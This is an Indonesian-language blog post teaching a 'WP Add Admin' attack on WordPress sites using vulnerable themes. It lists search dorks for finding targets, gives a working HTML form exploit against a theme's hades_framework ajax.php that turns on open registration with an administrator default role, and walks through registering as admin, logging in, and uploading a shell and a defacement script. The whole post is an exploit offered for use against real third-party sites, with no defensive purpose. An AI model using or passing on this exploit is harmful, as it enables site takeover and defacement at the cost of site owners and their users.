Hallo guys ^_^ , Kali ini saya mau share tutorial tentang WP Add Admin.
Gak usah banyak ngomong lagi soalnya pusing mau ngomong apaan lagi ane :V
Langsung aja simak ya :D
Bahan :
- Dork :
- inurl:/wp-content/themes/appius/
- inurl:/wp-content/themes/Consultant/
- inurl:/wp-content/themes/appius1/
- inurl:/wp-content/themes/archin/
- inurl:/wp-content/themes/averin/ - Exploit :
<form action="http://target.com/wp-content/themes/nama tema/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="email ente yg masih aktip">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form> - Shell kesayangan kalian :*
- Script Deface yang kalian Cintai :*
- Masukan Dork di atas ke mesin cuci kalian :V ( maksud ane mesin pencarian kalian ) :D
- Masukan exploitnya di belakang linknya. Contoh : http:site.co.li/wp-content/themes/namatema/hades_framework/option_panel/ajax.php
- Jika menemukan Site yang Perawan atau Vuln tampilannya akan Blank Putih
- Sekarang tinggal copy dulu Exploit Add adminnya dengan eksistensi "html"
- Sebelum di save kalian isikan Targetnya dulu dan masukan Email kalian yang aktif
- Tunggu hingga Prosses selesai dan Jika prosses selesai akan ada tulisan "success"
- Sekarang tinggal Add admin di targetnya. Contoh : http://site.co.li/wp-login.php?action=register
- Isikan data nya dan jika sukses check email kalian yang sudah di daftarkan di Wp-nya tadi
- Lalu Login dengan Username dan password yang tadi kalian buat :D
- Login Sukses :D
Mungkin itu saja yang ane mau kasih hari ini dan semoga bermanfaat untuk kalian :D
See You Next Time :*
No comments:
Post a Comment